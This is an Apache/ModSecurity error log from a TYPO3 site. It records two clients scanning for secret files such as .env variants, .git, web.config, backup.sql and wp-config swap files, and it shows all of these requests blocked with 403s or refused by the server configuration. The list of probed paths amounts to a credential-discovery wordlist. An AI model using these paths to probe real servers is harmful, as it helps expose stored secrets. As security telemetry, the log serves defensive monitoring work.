[Wed Apr 02 07:25:18.326429 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBbwAAAAM"]
[Wed Apr 02 07:25:18.326662 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBbwAAAAM"]
[Wed Apr 02 07:25:18.326843 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBbwAAAAM"]
[Wed Apr 02 07:25:18.353403 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBcAAAAAM"]
[Wed Apr 02 07:25:18.353628 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBcAAAAAM"]
[Wed Apr 02 07:25:18.353811 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBcAAAAAM"]
[Wed Apr 02 07:25:18.380528 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBcQAAAAM"]
[Wed Apr 02 07:25:18.380754 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBcQAAAAM"]
[Wed Apr 02 07:25:18.380923 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBcQAAAAM"]
[Wed Apr 02 07:25:18.410529 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Wed Apr 02 07:25:18.442353 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Wed Apr 02 07:25:18.564225 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Apr 02 07:25:18.591160 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBdwAAAAM"]
[Wed Apr 02 07:25:18.591327 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBdwAAAAM"]
[Wed Apr 02 07:25:18.591572 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBdwAAAAM"]
[Wed Apr 02 07:25:18.591732 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBdwAAAAM"]
[Wed Apr 02 07:25:18.617843 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htaccess
[Wed Apr 02 07:25:19.119935 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/CHANGELOG.txt
[Wed Apr 02 07:25:19.146860 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /app/etc/local.xml found within REQUEST_FILENAME: /app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Z-zKP4XG9q9bj4Y0L9vBfQAAAAM"]
[Wed Apr 02 07:25:19.147095 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Z-zKP4XG9q9bj4Y0L9vBfQAAAAM"]
[Wed Apr 02 07:25:19.147270 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Z-zKP4XG9q9bj4Y0L9vBfQAAAAM"]
[Wed Apr 02 07:25:19.219779 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Wed Apr 02 07:25:19.246785 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Wed Apr 02 07:25:19.273165 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.wp-config.php.swp
[Wed Apr 02 07:25:19.344585 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Wed Apr 02 07:25:19.459102 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configuration.php~
[Wed Apr 02 07:25:19.536747 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Z-zKP4XG9q9bj4Y0L9vBiAAAAAM"]
[Wed Apr 02 07:25:19.536991 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Z-zKP4XG9q9bj4Y0L9vBiAAAAAM"]
[Wed Apr 02 07:25:19.537173 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Z-zKP4XG9q9bj4Y0L9vBiAAAAAM"]
[Wed Apr 02 07:25:19.569885 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/yarn.lock" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /yarn.lock found within REQUEST_FILENAME: /yarn.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Z-zKP4XG9q9bj4Y0L9vBiQAAAAM"]
[Wed Apr 02 07:25:19.570130 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Z-zKP4XG9q9bj4Y0L9vBiQAAAAM"]
[Wed Apr 02 07:25:19.570357 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Z-zKP4XG9q9bj4Y0L9vBiQAAAAM"]
[Wed Apr 02 07:25:20.433280 2025] [:error] [pid 2192748] [client 154.83.103.15:27594] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "Z-zKQPes8FvEReXz3ciM0QAAAAk"]
[Wed Apr 02 07:25:20.433526 2025] [:error] [pid 2192748] [client 154.83.103.15:27594] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "Z-zKQPes8FvEReXz3ciM0QAAAAk"]
[Wed Apr 02 07:25:20.433740 2025] [:error] [pid 2192748] [client 154.83.103.15:27594] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "Z-zKQPes8FvEReXz3ciM0QAAAAk"]
[Wed Apr 02 07:25:20.459739 2025] [authz_core:error] [pid 2192748] [client 154.83.103.15:27594] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 07:25:20.486206 2025] [authz_core:error] [pid 2192748] [client 154.83.103.15:27594] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 07:25:20.512886 2025] [authz_core:error] [pid 2192748] [client 154.83.103.15:27594] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 07:25:20.539523 2025] [authz_core:error] [pid 2192748] [client 154.83.103.15:27594] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 07:25:20.566099 2025] [authz_core:error] [pid 2192748] [client 154.83.103.15:27594] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 07:25:20.779414 2025] [authz_core:error] [pid 2192748] [client 154.83.103.15:27594] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Wed Apr 02 07:25:20.806582 2025] [authz_core:error] [pid 2192748] [client 154.83.103.15:27594] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db_backup.sql
[Wed Apr 02 08:48:15.563004 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-zdr_es8FvEReXz3ciM4QAAAAk"]
[Wed Apr 02 08:48:15.563265 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-zdr_es8FvEReXz3ciM4QAAAAk"]
[Wed Apr 02 08:48:15.563439 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-zdr_es8FvEReXz3ciM4QAAAAk"]
[Wed Apr 02 08:48:15.590003 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-zdr_es8FvEReXz3ciM4gAAAAk"]
[Wed Apr 02 08:48:15.590281 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-zdr_es8FvEReXz3ciM4gAAAAk"]
[Wed Apr 02 08:48:15.590448 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-zdr_es8FvEReXz3ciM4gAAAAk"]
[Wed Apr 02 08:48:15.616926 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-zdr_es8FvEReXz3ciM4wAAAAk"]
[Wed Apr 02 08:48:15.617145 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-zdr_es8FvEReXz3ciM4wAAAAk"]
[Wed Apr 02 08:48:15.617297 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-zdr_es8FvEReXz3ciM4wAAAAk"]
[Wed Apr 02 08:48:15.644021 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-zdr_es8FvEReXz3ciM5AAAAAk"]
